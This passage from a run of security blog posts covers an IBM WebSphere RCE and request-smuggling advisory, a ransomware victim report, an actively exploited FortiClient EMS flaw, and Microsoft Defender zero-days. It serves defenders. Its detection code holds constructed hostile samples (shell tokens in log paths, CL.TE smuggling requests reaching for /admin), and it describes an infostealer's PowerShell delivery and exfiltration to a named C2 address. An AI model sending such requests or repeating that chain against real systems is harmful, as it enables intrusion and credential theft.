Note that the vulnerability affects "installations that utilize optional web server plug-ins": the core product is named, but the plug-in configuration is a prerequisite for exploiting CVE-2026-8633, so organizations on these versions should check whether their deployments include the plug-ins. That both deployment profiles are affected shows the flaw is not tied to one deployment model. WebSphere Application Server traditional is the long-standing full-profile server with the complete feature set for large, complex enterprise deployments; WebSphere Application Server Liberty is a lightweight, modular server for cloud-native applications, microservices, and development environments, with a smaller footprint and faster startup.

Detection

Detecting exploitation attempts for CVE-2026-8633 and CVE-2026-8620 requires a layered monitoring strategy, especially since the public advisory provides no indicators of compromise (IOCs) or signatures. Because CVE-2026-8633 involves specially crafted requests to the Web Server Plug-ins leading to remote code execution, monitoring network traffic and server logs for anomalous patterns is essential. Focus on these areas:

- Network intrusion detection/prevention (NIDS/NIPS): with no vendor signatures available, flag unusual HTTP request patterns aimed at WebSphere Application Server endpoints, especially those handled by the web server plug-ins. Look for unexpected HTTP methods or headers; unusually long or malformed URL paths and parameters; rapid successive requests from a single source IP across varied paths, which can indicate probing or scanning; and requests carrying shell commands or code snippets in headers or body, particularly when URL-encoded or otherwise obfuscated.
- Web server and application server logs: review access logs from the web server (IBM HTTP Server, Apache HTTP Server) and from WebSphere Application Server for anomalies. In web server logs, watch for unusual status codes (500-level errors following malformed requests) or requests to unusual resource paths. In WebSphere logs, look for error messages, security exceptions, or entries indicating unexpected process execution, particularly from unauthenticated sessions; new processes or shell commands executed within the WebSphere Application Server process space are a strong indicator of compromise.
- Endpoint detection and response (EDR): on the WebSphere host, monitor for unusual child processes of the WebSphere Application Server process (cmd.exe, powershell.exe, bash, sh), unexpected file writes, changes to system configuration files, new executables in unusual directories, and outbound connections from the WebSphere process to suspicious external IP addresses or domains.
- SIEM correlation: aggregate NIDS/NIPS, web server, application server, and EDR logs into a SIEM and build correlation rules that detect an exploitation attempt followed by post-exploitation activity.

For CVE-2026-8620 (HTTP request smuggling), detection is more complex.
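Two of the checks above can be expressed directly: scoring web server access-log lines for the request anomalies listed, and a strict request-framing test for the Content-Length / Transfer-Encoding ambiguity that request smuggling relies on. This is an added example written for this page, not code from IBM, and nothing in it is a signature for CVE-2026-8633, for which the advisory publishes none; the log lines and raw requests are constructed, using documentation address ranges:

```python
"""Two checks for the WebSphere detection guidance above.

Added example, not code from IBM or from the advisory, which publishes no
signatures for CVE-2026-8633. score_access_line() applies the access-log
heuristics (odd methods, long or encoded paths, shell tokens, 5xx after a
malformed request) to NCSA common-format lines such as IBM HTTP Server or
Apache httpd write. request_boundary_issues() is the strict framing check a
front end can apply to reject the Content-Length / Transfer-Encoding
ambiguities that request smuggling (the CVE-2026-8620 class) depends on.
Log lines and requests are constructed; the addresses are documentation ranges."""
import re
from collections import Counter
from urllib.parse import unquote

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
NORMAL_METHODS = {"GET", "POST", "PUT", "DELETE", "HEAD", "OPTIONS", "PATCH"}
SHELL_TOKENS = re.compile(r"/bin/(?:ba)?sh|cmd\.exe|powershell|\$\(|`|\|\s*(?:sh|bash)\b|;\s*(?:id|whoami|curl|wget)\b", re.I)

SAMPLE_LOG = [  # constructed
    '203.0.113.5 - - [30/May/2026:10:00:01 +0000] "GET /app/index.jsp HTTP/1.1" 200 1843',
    '198.51.100.9 - - [30/May/2026:10:00:02 +0000] "GET /app/%3b%20/bin/sh HTTP/1.1" 500 0',
    '198.51.100.9 - - [30/May/2026:10:00:02 +0000] "PROPFIND /app/' + "A" * 600 + ' HTTP/1.1" 400 0',
]


def score_access_line(line, max_path=512):
    """Return {ip, score, reasons} for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    path = unquote(unquote(m["path"]))  # decode twice: double encoding is a common evasion
    if m["method"] not in NORMAL_METHODS:
        reasons.append("unusual-method")
    if len(m["path"]) > max_path:
        reasons.append("long-path")
    if SHELL_TOKENS.search(path):
        reasons.append("shell-tokens-in-path")
    if m["status"].startswith("5") and reasons:
        reasons.append("5xx-after-malformed")
    return {"ip": m["ip"], "score": len(reasons), "reasons": reasons}


def burst_sources(lines, threshold=2):
    """Source IPs with at least `threshold` flagged lines: the probing/scanning signal."""
    hits = Counter(r["ip"] for r in map(score_access_line, lines) if r and r["score"])
    return {ip for ip, n in hits.items() if n >= threshold}


def request_boundary_issues(raw: bytes) -> list:
    """Reasons a raw HTTP/1.1 request head has ambiguous framing; empty means unambiguous.
    A strict front end rejects any request that yields a non-empty list."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    reasons, cl, te = [], [], []
    for h in head.split(b"\r\n")[1:]:
        if h[:1] in (b" ", b"\t"):
            reasons.append("obs-fold")  # line folding: parsers disagree on it
            continue
        name, sep, value = h.partition(b":")
        if not sep:
            reasons.append("malformed-header")
            continue
        if name != name.strip():
            reasons.append("space-before-colon")  # "Content-Length : 5" is honoured by some parsers, ignored by others
        key = name.strip().lower()
        if key == b"content-length":
            cl.append(value.strip())
        elif key == b"transfer-encoding":
            te.append(value.strip())
    if cl and te:
        reasons.append("cl-and-te-both-present")  # the classic CL.TE / TE.CL setup
    if len(set(cl)) > 1:
        reasons.append("conflicting-content-length")
    if any(not v.isdigit() for v in cl):
        reasons.append("non-numeric-content-length")
    if any(v.lower() != b"chunked" for v in te):
        reasons.append("obfuscated-transfer-encoding")  # e.g. "xchunked" or "chunked, identity"
    return reasons


CLEAN = b"POST /app HTTP/1.1\r\nHost: ws.example\r\nContent-Length: 5\r\n\r\nhello"
CL_TE = (b"POST /app HTTP/1.1\r\nHost: ws.example\r\nContent-Length: 4\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\n")
TE_OBF = b"POST /app HTTP/1.1\r\nHost: ws.example\r\nTransfer-Encoding: xchunked\r\n\r\n"

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(score_access_line(line))
    print(burst_sources(SAMPLE_LOG))
    for req in (CLEAN, CL_TE, TE_OBF):
        print(request_boundary_issues(req))
```

The framing check is the same rule a hardened front end should apply before forwarding to the plug-in: any request with a non-empty issue list is rejected rather than normalized, because normalizing it differently from the back end is exactly the disagreement an attacker exploits.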
Monitoring for discrepancies in how different components interpret request length (Content-Length versus Transfer-Encoding) is difficult but critical. Look for front-end logs that show different request sizes or truncated requests compared with back-end logs for the same transaction, and for unexpected back-end responses or errors that do not correspond to the request the front end apparently received. These vulnerabilities require proactive monitoring against a baseline of normal server behavior so that exploitation attempts can be recognized and answered quickly.

Remediation

Remediation for CVE-2026-8633 and CVE-2026-8620 means applying the official IBM patches. IBM has developed a permanent fix, APAR PH71342, which will ship in upcoming Fix Packs for the affected WebSphere Application Server versions. The recommended process:

- Patch application: monitor the IBM support portal and security bulletins for Fix Packs containing APAR PH71342. When available, download and apply them to every affected IBM WebSphere Application Server traditional and Liberty installation, making sure both Version 8.5 and Version 9.0 instances reach the latest secure level. Applying the Fix Packs is the most effective mitigation; follow IBM's official patching instructions to avoid operational downtime.
- Testing updates: before production deployment, test the updates on non-production systems that mirror production to catch compatibility issues or regressions, and verify that critical applications and functions still operate as expected.
- Mitigation for HTTP request smuggling (CVE-2026-8620): the vendor's request smuggling fix should be applied alongside the Fix Packs for CVE-2026-8633; it is likely included in the same Fix Packs, but administrators should confirm. Also review and configure intermediate devices such as load balancers, proxies, and web application firewalls to enforce strict HTTP parsing, since consistent interpretation of request boundaries across every component is what defeats smuggling.
- System hardening and monitoring: after patching, review system configuration against security best practices and keep monitoring for activity that might indicate lingering exposure or new threats, such as unexpected errors, unauthorized access attempts, or unusual process execution. Keep all infrastructure components current, not just WebSphere: operating systems, underlying web servers, and other middleware. Addressing vulnerabilities in other critical IBM products matters too, as shown in our analysis of IBM ELM Jazz CVE-2026-3660.

Proactively applying these fixes is crucial to securing corporate networks and to the long-term integrity of enterprise web applications.

Technical Takeaways

- CVE-2026-8633 is an unauthenticated remote code execution vulnerability in IBM WebSphere Application Server with a CVSS score of 9.8.
- It affects WebSphere Application Server traditional and WebSphere Application Server Liberty versions 8.5 and 9.0 when the optional web server plug-ins are in use.
- Exploitation involves a specially crafted request to the Web Server Plug-ins, allowing an attacker to execute arbitrary commands on the host.
- A related vulnerability, CVE-2026-8620, is an HTTP request smuggling issue that can be chained with other attacks.
- Remediation requires applying the upcoming Fix Packs containing APAR PH71342 for both vulnerabilities; deploy urgently after thorough testing.

---

## 25 New Ransomware Victims as Com Ecosystem Expands

- URL: https://purple-ops.io/blog/ransomware-victims-com-ecosystem
- Date: 2026-05-29
- Category: Ransomware Report
- Tags: ransomware-victims, the-gentelman, com-ecosystem, extortion, ransomware-trends
- Reading time: 5 min

**Summary:** 25 new ransomware victims were reported as The Com ecosystem emerges, expanding the overall ransomware and extortion threat landscape.

25 New Ransomware Victims as Com Ecosystem Expands

Statistical Overview

Victim totals: this month 744; this quarter 1522; year to date 4147; last 24h 25.
Quarterly breakdown: Q1 2631 | Q2 1522 | Q3 0 | Q4 0

Ransomware activity maintains a steady pace and keeps adding to this quarter's victim count, with many new compromises reported.

Introduction

The past period saw 25 new ransomware victims across diverse sectors and geographies. The_Gentelman was the most active group, accounting for four of these incidents. Primary target sectors were Legal Services and Healthcare, and the United States remained the most frequently affected country.
Ransomware Summary Table

| # | Group | Victims (24h) | Sample Victims | Geos | Sectors |
|---|---|---|---|---|---|
| 1 | The Gentelman | 4 | Corporacion prokompra, Fonderia corra, Grupo premier (+1) | Italy, Mexico | Agriculture & Food, Manufacturing |
| 2 | Akira | 2 | Interstate roofing, Schacht law office | United States | Construction & Engineering, Legal |
| 3 | CMD | 2 | Capital Family Physicians, Heart of America Eye Care | United States | Healthcare |
| 4 | Chaos | 2 | Entransinternational.com, Powerhousenow.com | United States | Manufacturing, Professional Services |
| 5 | Everest | 2 | Asopagos s.a., Ерм | United Kingdom, Colombia | Government / Public Sector, Professional Services |
| 6 | 0day-syndicate | 1 | Braincell (braincell.sa, rfcargo.braincell.solutions, rf.braincell.solutions, governata.com) | Saudi Arabia | Technology / Software |
| 7 | AiLock | 1 | Restorative therapies, inc. | United States | Manufacturing |
| 8 | Genesis | 1 | Peña & bromberg | United States | Legal |
| 9 | Gunra | 1 | Somafix | France | Retail & Ecommerce |
| 10 | INC Ransom | 1 | belimed.com | Switzerland | Healthcare |
| 11 | Lamashtu | 1 | Shanpoornammetals.com | Malaysia | Energy & Utilities |
| 12 | LeakedData | 1 | Fox rothschild llp | United States | Legal |

The_Gentelman was the most prolific group, claiming four victims across manufacturing and agriculture. Akira, Chaos, CMD, and Everest each reported two new compromises, spanning professional services, construction, healthcare, and government entities. CMD ransomware continued its targeting of the healthcare sector. Everest's compromise of Asopagos s.a. in Colombia indicates ongoing risk to the Government/Public Sector.

Victim Distribution

By country: United States 14; Venezuela 1; Colombia 1; United Kingdom 1; Switzerland 1; Sri Lanka 1; Saudi Arabia 1; Mexico 1; Malaysia 1; Italy 1.

By industry: Legal Services 3; Healthcare 2; Retail 2; Business Services & Supplies 1; Wholesale Greenhouse 1; Transportation Equipment Manufacturing 1; Precious Metals Refining 1; Medical Equipment Manufacturing 1; Facilities Services 1; Education 1.

The United States remains the primary target country for ransomware, representing over half of the reported victims.
Targeting is diverse, but Legal Services and Healthcare show a clear concentration, reflecting persistent pressure on professional and essential services.

Ransomware News

Topline: complex criminal ecosystems are emerging alongside persistent ransomware and extortion campaigns, and the combination is influencing cyber insurance market dynamics.

Campaigns & Operations: Flashpoint's analysis details "The Com," a diffuse neo-Nazi criminal ecosystem whose "Hacker Com" wing is involved in breaches, DDoS attacks, and ransomware activity, recruits from gaming communities, and targets cloud and SaaS platforms. Separately, Qilin ransomware confirmed a cyber incident at Kennedy McLaughlin & Associates, an accounting firm, and DragonForce allegedly breached QLS Group, a Victorian retail logistics firm. ShinyHunters ran a voice-phishing attack against Charter Communications, compromising an employee's Microsoft Entra identity and accessing a Salesforce instance, affecting 4.9 million accounts. A ransomware-style attack also hit Portraitbox GmbH, a German IT service provider for school photographers.

Vulnerabilities & TTPs: threat actors are relying on social engineering such as the voice phishing ShinyHunters used to obtain a Microsoft Entra identity and reach Salesforce. The Com ecosystem targets widely adopted cloud and SaaS platforms, including Okta, Salesforce, and Microsoft 365.

Analyst Note: these incidents show threat actors growing more sophisticated and the need for strong defenses against social engineering and supply chain compromise.

Technical Takeaways

- The_Gentelman is the most active group, claiming four new victims across manufacturing and agriculture.
- The United States is the primary target country, accounting for 14 of the 25 reported ransomware victims.
- Legal Services and Healthcare are consistently targeted by multiple ransomware groups, along with Manufacturing.
- Extortion campaigns continue to use social engineering, specifically voice phishing, to compromise cloud and SaaS platforms.
- New threat ecosystems such as "The Com" are emerging, integrating ransomware with broader criminal activity including child exploitation and physical intimidation.

---

## FortiClient EMS CVE-2026-35616 (CVSS 9.1) Exploited

- URL: https://purple-ops.io/blog/forticlient-ems-cve-2026-35616-exploit
- Date: 2026-05-29
- Category: CVE Analysis
- Tags: forticlient-ems, cve-2026-35616, credential-theft, exploitation, pre-authentication
- Reading time: 5 min | CVSS: 9.1

**Summary:** FortiClient EMS CVE-2026-35616, a critical (CVSS 9.1) pre-authentication flaw, is actively exploited to steal credentials.

FortiClient EMS CVE-2026-35616 (CVSS 9.1) Exploited

Fortinet FortiClient Endpoint Management Server (EMS) is affected by CVE-2026-35616, a critical pre-authentication API access bypass that leads to privilege escalation, with a CVSS score of 9.1. It lets an unauthenticated attacker gain elevated privileges on the EMS server and manipulate critical management functions. Recent intelligence indicates active exploitation: attackers use CVE-2026-35616 to deploy credential-stealing malware across managed endpoints. Attacks observed in May 2026 abuse the trusted endpoint management infrastructure to deliver payloads disguised as legitimate Fortinet updates. The campaigns' primary objective is information theft, specifically browser-saved credentials, session cookies, and autofill data.
Exploiting this vulnerability bypasses initial authentication, giving attackers control over the FortiClient EMS server and, subsequently, its managed endpoints. Impact Exploiting CVE-2026-35616 gives an attacker complete control over FortiClient EMS and its managed endpoints, which leads directly to data exfiltration. Successful exploitation of this pre-authentication API access bypass (CVSS score: 9.1) allows attackers to modify EMS management configurations in a privileged context. This capability is then used to push malicious scripts for execution across all managed endpoints connected to the compromised EMS server. The core malicious payload observed is a previously unreported Windows information stealer, identified as FortiEndpoint_Patch.exe, which masquerades as a Fortinet update. This information stealer harvests sensitive data from Chromium- and Gecko-based web browsers. Data targeted includes user passwords, session cookies, and autofill details such as credit card information, physical addresses, and phone numbers. The exfiltration of session cookies is a significant risk, as these can provide attackers with follow-on access to many cloud services, internal applications, and other authenticated resources. When session reuse is possible, these stolen session cookies may allow attackers to circumvent multi-factor authentication (MFA) prompts, giving them unauthorized, persistent access without needing actual credentials. Because attackers abuse the FortiClient EMS's trust and management pathways, every endpoint managed by the compromised server becomes a potential execution target for the malicious payload. This removes the need for separate intrusion paths for each device, greatly expanding attack reach and efficiency. 
The compromised environment effectively turns the organization's own endpoint management solution into a malware distribution mechanism, making it hard for security teams to tell legitimate and malicious operations apart. This broad compromise risk is why CVE-2026-35616 must be addressed immediately.

Exploitation Chain

Exploitation of CVE-2026-35616 begins with the pre-authentication API access bypass, which gives the attacker privileged access to FortiClient EMS functionality without authenticating. That access is used to alter EMS configuration and distribute payloads to managed endpoints. Our prior analysis of Fortinet authentication bypass flaws details how such vulnerabilities provide initial access and control. After compromising the EMS server, attackers take these steps to prepare malware delivery and stay covert:

- Configuration modification: EMS settings are changed, including deferring firmware upgrade reminders, likely to stop legitimate updates from interfering or raising suspicion.
- Remote Access Profile manipulation: a Remote Access Profile is altered to insert a malicious script for execution on endpoints, using EMS's legitimate management pathway to push attacker-controlled code.
- Endpoint policy injection: an endpoint policy is modified to embed the same script, ensuring distribution and execution across all managed endpoints while looking like a standard management task.

Execution on each endpoint then follows a multi-stage process:

- Legitimate executable abuse: fortitray.exe, a FortiClient component, launches a .cmd script, blending the activity with normal FortiClient processes and making detection harder.
- PowerShell invocation: the .cmd script invokes a Base64-encoded PowerShell script; the encoding obscures the commands and evades simple signature matching.
- Payload delivery: the PowerShell script downloads the primary payload, FortiEndpoint_Patch.exe, disguised as a Fortinet endpoint update to exploit trust in official patches.
- Malware execution and data harvesting: FortiEndpoint_Patch.exe is a Windows information stealer with no network exfiltration capability of its own. It harvests passwords, cookies, and autofill data from Chromium- and Gecko-based browsers and writes the results to a log file under the ProgramData directory on the endpoint.
- Data exfiltration: the same PowerShell script that delivered the payload then sends the log file's contents to attacker-controlled infrastructure via an HTTP POST request. The observed C2 server is 83.138.53[.]110.

This execution pattern shows a detailed understanding of how FortiClient EMS operates, letting attackers push malicious PowerShell commands that closely mimic legitimate management operations; that increases stealth and the attack's ability to spread across the network. For more on this vulnerability and its impact on Fortinet EMS, see our full analysis of CVE-2026-35616 and Fortinet EMS.

Affected products and versions

CVE-2026-35616 affects Fortinet FortiClient Endpoint Management Server (EMS): all versions prior to 7.4.7.
Organizations running FortiClient EMS versions earlier than 7.4.7 should consider their installations vulnerable and potentially compromised, given the active exploitation.

### Detection

Detecting exploitation of CVE-2026-35616 requires a multi-layered approach focusing on network, endpoint, and server-side indicators. Since the attack uses legitimate management pathways, anomalies in system behavior and process execution are the crucial indicators.

**Network Indicators:**

- Outbound Connections to C2: Monitor all outbound network traffic from FortiClient EMS servers and managed endpoints for connections to 83.138.53[.]110. Specifically, look for HTTP POST requests from these devices, which indicate data exfiltration.
- Unusual EMS Traffic Patterns: Establish a baseline for normal FortiClient EMS network communication. Deviations such as unexpected spikes in outbound data or connections to unusual external IP addresses require investigation.
- Encrypted Traffic Anomalies: While the observed exfiltration uses HTTP POST, attackers may pivot to encrypted channels. Monitor for unusual SSL/TLS certificate usage or connections to newly observed domains from EMS servers and managed endpoints.

**Endpoint Indicators (EDR/SIEM Queries):**

- Process Creation Chains: Look for fortitray.exe (a FortiClient component) spawning cmd.exe. Then investigate cmd.exe launching powershell.exe, especially with Base64-encoded arguments. Sample EDR query (pseudo-code):

  ```
  Process.parent.name == "fortitray.exe" AND Process.name == "cmd.exe"
    followed by
  Process.parent.name == "cmd.exe" AND Process.name == "powershell.exe"
    AND Process.command_line CONTAINS "EncodedCommand"
  ```

- Malicious Payload Presence: Search for files named FortiEndpoint_Patch.exe or similar suspicious executables in unexpected directories, especially user profiles or the ProgramData directory. Monitor for the creation of new executable files that mimic legitimate Fortinet update names.
- PowerShell Script Execution: Detect PowerShell execution with EncodedCommand parameters. Decode and analyze the commands for suspicious activity such as downloading files from external URLs, modifying system configurations, or initiating network connections. Look for PowerShell scripts creating log files in the ProgramData directory, particularly those containing sensitive data patterns (e.g., "password", "cookie").
- File System Changes: Monitor for creation or modification of files within the ProgramData directory that appear to be temporary log files, especially those containing harvested credentials or browser data. Look for suspicious .cmd script creations or modifications, particularly in directories associated with FortiClient or system startup.
- Registry and Configuration Changes: Monitor for modifications to FortiClient EMS configurations related to firmware upgrade reminders, Remote Access Profiles, or endpoint policies. These changes indicate post-exploitation activity on the EMS server. Detect unusual changes to FortiClient agent settings on managed endpoints that might allow silent script execution or data collection.

**Server-Side (FortiClient EMS) Indicators:**

- API Access Anomalies: Review FortiClient EMS server logs for unauthorized or unexpected API access attempts, especially those without prior authentication. Look for successful API calls from untrusted sources that modify configuration settings related to endpoint policies or remote access profiles.
- Administrative Account Usage: Monitor for unusual activity by administrative accounts on the EMS server, especially where it coincides with configuration changes that enable script injection.
- Log Integrity: Verify the integrity of FortiClient EMS logs to ensure they have not been tampered with or cleared by an attacker.

Organizations should integrate threat intelligence on known malware artifacts and C2 infrastructure into their detection systems to increase the likelihood of identifying these attacks.
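The process-chain pseudo-query and the C2 indicator above, turned into runnable detection logic as an added example (not code from the article or from Fortinet): it walks constructed Sysmon-style process-creation events, decodes the -EncodedCommand argument (UTF-16LE, then Base64) and matches the fortitray.exe -> cmd.exe -> powershell.exe chain per host, then checks constructed outbound HTTP events for POSTs to the reported C2 address. The event field names and every sample event are constructed assumptions.

```python
"""Detection logic for the CVE-2026-35616 endpoint execution chain.

Added example (not code from the article or from Fortinet). Event fields
host/pid/ppid/image/cmdline mimic Sysmon Event ID 1 / EDR telemetry; every
event below is constructed, and the encoded command is a harmless placeholder.
"""
import base64
import re
from typing import Optional

C2_IP_DEFANGED = "83.138.53[.]110"          # as reported in the article
C2_IP = C2_IP_DEFANGED.replace("[.]", ".")  # refanged for comparison

# Constructed placeholder, encoded the way PowerShell expects: UTF-16LE then Base64.
PLACEHOLDER_SCRIPT = "Write-Output 'constructed sample'"
PLACEHOLDER_B64 = base64.b64encode(PLACEHOLDER_SCRIPT.encode("utf-16le")).decode()

# Constructed process-creation events (not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    {"host": "WS-01", "pid": 100, "ppid": 1, "image": "fortitray.exe",
     "cmdline": r'"C:\Program Files\Fortinet\FortiClient\fortitray.exe"'},
    {"host": "WS-01", "pid": 200, "ppid": 100, "image": "cmd.exe",
     "cmdline": r"cmd.exe /c C:\ProgramData\update.cmd"},
    {"host": "WS-01", "pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": f"powershell.exe -NoProfile -EncodedCommand {PLACEHOLDER_B64}"},
    # Benign look-alike: an encoded command from an Explorer-launched shell.
    {"host": "WS-02", "pid": 110, "ppid": 1, "image": "explorer.exe",
     "cmdline": "explorer.exe"},
    {"host": "WS-02", "pid": 210, "ppid": 110, "image": "cmd.exe", "cmdline": "cmd.exe"},
    {"host": "WS-02", "pid": 310, "ppid": 210, "image": "powershell.exe",
     "cmdline": f"powershell.exe -enc {PLACEHOLDER_B64}"},
]

# Constructed outbound HTTP events (not real telemetry).
SAMPLE_NETWORK_EVENTS = [
    {"host": "WS-01", "pid": 300, "dst_ip": C2_IP, "dst_port": 80, "method": "POST"},
    {"host": "WS-02", "pid": 310, "dst_ip": "10.0.0.5", "dst_port": 443, "method": "GET"},
]

# -e, -ec, -enc and -EncodedCommand are all accepted spellings of the switch.
_ENC_RE = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_fortitray_chains(events):
    """Apply the article's pseudo-query: powershell.exe with an encoded command,
    parent cmd.exe, grandparent fortitray.exe, all on the same host."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    findings = []
    for ev in events:
        if ev["image"].lower() != "powershell.exe":
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        parent = by_key.get((ev["host"], ev["ppid"]))
        if parent is None or parent["image"].lower() != "cmd.exe":
            continue
        grandparent = by_key.get((ev["host"], parent["ppid"]))
        if grandparent is None or grandparent["image"].lower() != "fortitray.exe":
            continue
        findings.append({"host": ev["host"], "pid": ev["pid"],
                         "cmd_script": parent["cmdline"], "decoded": decoded})
    return findings


def find_c2_posts(net_events):
    """Outbound HTTP POSTs to the reported C2 address (the exfiltration indicator)."""
    return [n for n in net_events if n["dst_ip"] == C2_IP and n["method"] == "POST"]


if __name__ == "__main__":
    for f in find_fortitray_chains(SAMPLE_PROCESS_EVENTS):
        print(f"[chain] {f['host']} pid={f['pid']} via {f['cmd_script']!r}: {f['decoded']!r}")
    for n in find_c2_posts(SAMPLE_NETWORK_EVENTS):
        print(f"[c2] {n['host']} pid={n['pid']} POST to {n['dst_ip']}:{n['dst_port']}")
```

The benign WS-02 chain is deliberately not flagged: an encoded command alone is common in administration, and the article's indicator is the fortitray.exe ancestry combined with it.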
### Remediation

Because CVE-2026-35616 is actively exploited, immediate and complete remediation steps are critical to mitigate risk and restore environment integrity.

- Patching: The most urgent remediation is to upgrade all FortiClient Endpoint Management Server (EMS) installations to version 7.4.7 or later. Fortinet has released patches for this pre-authentication API access bypass vulnerability. This update resolves the root cause of the unauthorized access and privilege escalation.
- Compromise Assessment: Because CVE-2026-35616 is actively exploited, a thorough compromise assessment is mandatory for all environments running FortiClient EMS versions prior to 7.4.7. This assessment should include:
  - Review FortiClient EMS server logs for unauthorized configuration changes, API access anomalies, and unusual administrative activity.
  - Scan all managed endpoints for FortiEndpoint_Patch.exe (or similar suspicious executables) and related malicious files in the ProgramData directory.
  - Analyze endpoint logs for the process execution chain of fortitray.exe spawning cmd.exe and then Base64-encoded powershell.exe commands.
  - Inspect network traffic logs for connections to the identified attacker C2 83.138.53[.]110 or other suspicious external IPs.
- Credential Rotation: If a compromise is suspected or confirmed, or if EMS was unpatched for an extended period, mandate a password reset for all users. Prioritize users with access to critical cloud services, internal applications, and sensitive authenticated resources, as their browser-saved credentials and session cookies may have been exfiltrated.
- MFA and Session Management Review: Re-evaluate multi-factor authentication (MFA) policy strength and enforcement across all critical systems. Since stolen session cookies can bypass MFA, consider stricter session validity durations and re-authentication requirements for high-privilege access.
- Endpoint Clean-up and Re-imaging: For endpoints confirmed to have executed the malicious payload, perform a thorough clean-up, which may include re-imaging affected devices to ensure complete removal of the infostealer and any persistence mechanisms.
- Enhanced Monitoring: Implement enhanced monitoring for the detection indicators outlined above. This includes continuous monitoring of EMS server logs, endpoint process execution, file system changes, and network traffic for suspicious activity, even after patching.
- Review and Harden EMS Configuration: Review FortiClient EMS configuration best practices, including network segmentation of the EMS server, restricting management interface access, and ensuring all EMS-related services run under the principle of least privilege.

Prompt action on these remediation steps will reduce the window of opportunity for attackers and limit the impact of this critical vulnerability.

### Technical Takeaways

- CVE-2026-35616 is a critical pre-authentication API access bypass vulnerability in FortiClient EMS, rated with a CVSS score of 9.1. It allows privilege escalation.
- The vulnerability is actively exploited, allowing attackers to gain unauthorized, privileged access to FortiClient EMS servers.
- Exploitation involves modifying EMS configurations and policies to use its legitimate management pathways for distributing malicious Base64-encoded PowerShell scripts to managed endpoints.
- The primary payload is a Windows information stealer (FortiEndpoint_Patch.exe) disguised as a Fortinet update. It harvests browser-saved credentials, session cookies, and autofill data from Chromium- and Gecko-based browsers.
- Stolen session cookies can provide follow-on access to cloud services and internal applications, potentially circumventing multi-factor authentication (MFA).
- Patching FortiClient EMS to version 7.4.7 or later is the immediate remediation. However, a complete compromise assessment and credential rotation are crucial due to active exploitation.

---

## Microsoft Defender Three Zero-Days Exploited

- URL: https://purple-ops.io/blog/microsoft-defender-three-zero-days-exploited
- Date: 2026-05-29
- Category: Threat Intelligence
- Tags: microsoft-defender, zero-day, windows-vulnerabilities, active-exploitation, chaotic-eclipse
- Reading time: 5 min

**Summary:** Microsoft confirms three Defender zero-days (CVEs 33825, 41091, 45498) are actively exploited after public disclosure, threatening Windows users.

Microsoft faces controversy after the uncoordinated public disclosure of six Windows zero-day vulnerabilities by a researcher operating under the alias Chaotic Eclipse (also known as Nightmare-Eclipse). The technology giant confirms that at least three of these flaws, BlueHammer (CVE-2026-33825), RedSun (CVE-2026-41091), and UnDefend (CVE-2026-45498), affecting Microsoft Defender and BitLocker components, are currently under active exploitation, which directly threatens Microsoft's customers.

This series of disclosures has started a debate about responsible vulnerability reporting, particularly since the researcher's accounts on GitHub and GitLab were subsequently removed. The incident shows the ongoing tension between security researchers seeking prompt vendor action and software providers advocating Coordinated Vulnerability Disclosure (CVD). Microsoft has publicly expressed strong opposition to these uncoordinated releases, stating that publishing proof-of-concept code for unpatched vulnerabilities introduces "unnecessary risk." The company's security teams have been working intensively to understand the impact, protect customers, and develop security updates for these issues.
This report examines the details of these Windows zero-days, patches for Samba enterprise file servers, the GreyVibe threat group's use of AI in cyberespionage against Ukrainian entities, and a wave of software supply chain attacks using malicious NuGet and npm packages to steal sensitive credentials and cloud secrets from developers globally.

### What zero-day vulnerabilities were publicly disclosed, and how are they being exploited?

The researcher Chaotic Eclipse publicly disclosed details for six zero-day vulnerabilities impacting various Windows components. Microsoft has confirmed that three of these, BlueHammer (CVE-2026-33825), RedSun (CVE-2026-41091), and UnDefend (CVE-2026-45498), are actively being exploited in attacks targeting users of Microsoft Defender and other Windows functionality. The other three disclosed flaws are YellowKey (CVE-2026-45585), GreenPlasma, and MiniPlasma, which primarily affect BitLocker and other Windows mechanisms.

BlueHammer (CVE-2026-33825) is a vulnerability in Microsoft Defender that has been actively exploited. Details surrounding its exploitation indicate methods that allow attackers to bypass security measures within the endpoint protection platform, which can facilitate further system compromise. This flaw shows the need for continuous monitoring and rapid patching of core security software.

RedSun (CVE-2026-41091) and UnDefend (CVE-2026-45498) also pertain to Microsoft Defender and other Windows components, and both have confirmed active exploitation. While specific details of their in-the-wild exploitation remain limited, their active status signals that threat actors are using these weaknesses to circumvent defensive controls. Vulnerabilities of this kind often lead to privilege escalation or arbitrary code execution on affected systems.

YellowKey (CVE-2026-45585), GreenPlasma, and MiniPlasma primarily impact BitLocker and other Windows privilege escalation avenues. YellowKey (CVE-2026-45585) is described as a BitLocker bypass vulnerability, which can allow unauthorized access to encrypted data. The exploitation methods for GreenPlasma and MiniPlasma involve local privilege escalation, enabling lower-privileged users to gain SYSTEM-level access on fully patched Windows systems. The public release of proof-of-concept code for these vulnerabilities, particularly the actively exploited ones, poses a greater risk to organizations and individual users, as it provides malicious actors with blueprints for attack.

The public disclosures by Chaotic Eclipse were made after the researcher alleged a breakdown in Microsoft's handling of the vulnerability disclosure process, citing a lack of communication and reward. In response, Microsoft reiterated its commitment to Coordinated Vulnerability Disclosure (CVD), stating that such uncoordinated disclosures create "unnecessary risk" for customers. The fallout included the removal of Chaotic Eclipse's GitHub account, followed by the blocking of a newly created GitLab account where the exploit code had been re-uploaded, which escalated the dispute between the researcher and the vendor. The researcher has also indicated plans for further disclosures on July 14, 2026.

### What vulnerabilities affect Samba installations globally?

